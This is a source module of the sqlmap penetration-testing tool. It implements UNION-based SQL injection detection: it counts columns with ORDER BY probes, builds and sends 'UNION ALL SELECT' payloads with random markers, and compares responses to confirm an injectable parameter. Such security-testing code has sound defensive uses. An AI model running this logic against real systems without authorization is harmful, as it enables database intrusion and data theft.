sqlmap/lib/techniques/union/test.py
2024-01-03 23:11:52 +01:00

403 lines
18 KiB
Python

#!/usr/bin/env python
"""
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import itertools
import logging
import random
import re
from lib.core.agent import agent
from lib.core.common import average
from lib.core.common import Backend
from lib.core.common import getPublicTypeMembers
from lib.core.common import isNullValue
from lib.core.common import listToStrValue
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import removeReflectiveValues
from lib.core.common import setTechnique
from lib.core.common import singleTimeLogMessage
from lib.core.common import singleTimeWarnMessage
from lib.core.common import stdev
from lib.core.common import wasLastResponseDBMSError
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.decorators import stackedmethod
from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import FUZZ_UNION_COLUMN
from lib.core.enums import PAYLOAD
from lib.core.settings import FUZZ_UNION_ERROR_REGEX
from lib.core.settings import FUZZ_UNION_MAX_COLUMNS
from lib.core.settings import LIMITED_ROWS_TEST_NUMBER
from lib.core.settings import MAX_RATIO
from lib.core.settings import MIN_RATIO
from lib.core.settings import MIN_STATISTICAL_RANGE
from lib.core.settings import MIN_UNION_RESPONSES
from lib.core.settings import NULL
from lib.core.settings import ORDER_BY_MAX
from lib.core.settings import ORDER_BY_STEP
from lib.core.settings import UNION_MIN_RESPONSE_CHARS
from lib.core.settings import UNION_STDEV_COEFF
from lib.core.unescaper import unescaper
from lib.request.comparison import comparison
from lib.request.connect import Connect as Request
def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
"""
Finds number of columns affected by UNION based injection
"""
retVal = None
@stackedmethod
def _orderByTechnique(lowerCount=None, upperCount=None):
def _orderByTest(cols):
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None
if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1):
infoMsg = "'ORDER BY' technique appears to be usable. "
infoMsg += "This should reduce the time needed "
infoMsg += "to find the right number "
infoMsg += "of query columns. Automatically extending the "
infoMsg += "range for current UNION query injection technique test"
singleTimeLogMessage(infoMsg)
lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount
found = None
while not found:
if not conf.uCols and _orderByTest(highCols):
lowCols = highCols
highCols += ORDER_BY_STEP
if highCols > ORDER_BY_MAX:
break
else:
while not found:
mid = highCols - (highCols - lowCols) // 2
if _orderByTest(mid):
lowCols = mid
else:
highCols = mid
if (highCols - lowCols) < 2:
found = lowCols
return found
try:
pushValue(kb.errorIsNone)
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop
if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # Note: ORDER BY is not bullet-proof
found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()
if found:
kb.orderByColumns = found
infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "")
singleTimeLogMessage(infoMsg)
return found
elif kb.futileUnion:
return None
if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES:
upperCount = lowerCount + MIN_UNION_RESPONSES
min_, max_ = MAX_RATIO, MIN_RATIO
pages = {}
for count in xrange(lowerCount, upperCount + 1):
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar):
pages[count] = page
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
if not isNullValue(kb.uChar):
value = re.escape(kb.uChar.strip("'"))
for regex in (value, r'>\s*%s\s*<' % value):
contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None]
if len(contains) == 1:
retVal = contains[0]
break
if not retVal:
if min_ in ratios:
ratios.pop(ratios.index(min_))
if max_ in ratios:
ratios.pop(ratios.index(max_))
minItem, maxItem = None, None
for item in items:
if item[1] == min_:
minItem = item
elif item[1] == max_:
maxItem = item
if all(_ == min_ and _ != max_ for _ in ratios):
retVal = maxItem[0]
elif all(_ != min_ and _ == max_ for _ in ratios):
retVal = minItem[0]
elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE:
deviation = stdev(ratios)
if deviation is not None:
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
if min_ < lower:
retVal = minItem[0]
if max_ > upper:
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
retVal = maxItem[0]
finally:
kb.errorIsNone = popValue()
if retVal:
infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal
singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", 'N', infoMsg))
return retVal
def _fuzzUnionCols(place, parameter, prefix, suffix):
retVal = None
if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns:
comment = queries[Backend.getIdentifiedDbms()].comment.query
choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True)
random.shuffle(choices)
for candidate in itertools.product(choices, repeat=kb.orderByColumns):
if retVal:
break
elif FUZZ_UNION_COLUMN.STRING not in candidate:
continue
else:
candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate]
query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""):
for column in candidate:
if column.startswith("'") and column.strip("'") in (page or ""):
retVal = [(_ if _ != column else "%s") for _ in candidate]
break
return retVal
def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None
vector = None
positions = [_ for _ in xrange(0, count)]
# Unbiased approach for searching appropriate usable column
random.shuffle(positions)
for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS):
if vector:
break
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(charCount)
phrase = ("%s%s%s" % (kb.chars.start, randQuery, kb.chars.stop)).lower()
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.escape(randQueryProcessed)
# Forge the union SQL injection request
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
if content and phrase in content:
validPayload = payload
kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, conf.forcePartial, kb.tableFrom, kb.unionTemplate)
if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(charCount)
phrase2 = ("%s%s%s" % (kb.chars.start, randQuery2, kb.chars.stop)).lower()
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.escape(randQueryProcessed2)
# Confirm that it is a full union SQL injection
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = ("%s%s" % (page or "", listToStrValue(headers.headers if headers else None) or "")).lower()
if not all(_ in content for _ in (phrase, phrase2)):
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
elif not kb.unionDuplicates:
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output
query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = ("%s%s" % (removeReflectiveValues(page, payload) or "", removeReflectiveValues(listToStrValue(headers.headers if headers else None), payload, True) or "")).lower()
if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER:
warnMsg = "output with limited number of rows detected. Switching to partial mode"
logger.warning(warnMsg)
vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True, kb.tableFrom, kb.unionTemplate)
unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError()
if unionErrorCase and count > 1:
warnMsg = "combined UNION/error-based SQL injection case found on "
warnMsg += "column %d. sqlmap will try to find another " % (position + 1)
warnMsg += "column with better characteristics"
logger.warning(warnMsg)
else:
break
return validPayload, vector
def _unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None
vector = None
# Confirm the union SQL injection and get the exact column
# position which can be used to extract data
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full union
# SQL injection position
if not validPayload:
validPayload, vector = _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
return validPayload, vector
def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
"""
This method tests if the target URL is affected by an union
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
"""
validPayload = None
vector = None
orderBy = kb.orderByColumns
uChars = (conf.uChar, kb.uChar)
where = PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE
# In case that user explicitly stated number of columns affected
if conf.uColsStop == conf.uColsStart:
count = conf.uColsStart
else:
count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where)
if count:
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not all((validPayload, vector)) and not all((conf.uChar, conf.dbms, kb.unionTemplate)):
if Backend.getIdentifiedDbms() and kb.orderByColumns and kb.orderByColumns < FUZZ_UNION_MAX_COLUMNS:
if kb.fuzzUnionTest is None:
msg = "do you want to (re)try to find proper "
msg += "UNION column types with fuzzy test? [y/N] "
kb.fuzzUnionTest = readInput(msg, default='N', boolean=True)
if kb.fuzzUnionTest:
kb.unionTemplate = _fuzzUnionCols(place, parameter, prefix, suffix)
warnMsg = "if UNION based SQL injection is not detected, "
warnMsg += "please consider "
if not conf.uChar and count > 1 and kb.uChar == NULL and conf.uValues is None:
message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] "
if not readInput(message, default='Y', boolean=True):
warnMsg += "usage of option '--union-char' "
warnMsg += "(e.g. '--union-char=1') "
else:
conf.uChar = kb.uChar = str(randomInt(2))
validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not conf.dbms:
if not conf.uChar:
warnMsg += "and/or try to force the "
else:
warnMsg += "forcing the "
warnMsg += "back-end DBMS (e.g. '--dbms=mysql') "
if not all((validPayload, vector)) and not warnMsg.endswith("consider "):
singleTimeWarnMessage(warnMsg)
if orderBy is None and kb.orderByColumns is not None and not all((validPayload, vector)): # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
conf.uChar, kb.uChar = uChars
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
return validPayload, vector
@stackedmethod
def unionTest(comment, place, parameter, value, prefix, suffix):
"""
This method tests if the target URL is affected by an union
SQL injection vulnerability. The test is done up to 3*50 times
"""
if conf.direct:
return
negativeLogic = kb.negativeLogic
setTechnique(PAYLOAD.TECHNIQUE.UNION)
try:
if negativeLogic:
pushValue(kb.negativeLogic)
pushValue(conf.string)
pushValue(conf.code)
kb.negativeLogic = False
conf.string = conf.code = None
validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
finally:
if negativeLogic:
conf.code = popValue()
conf.string = popValue()
kb.negativeLogic = popValue()
if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload)
return validPayload, vector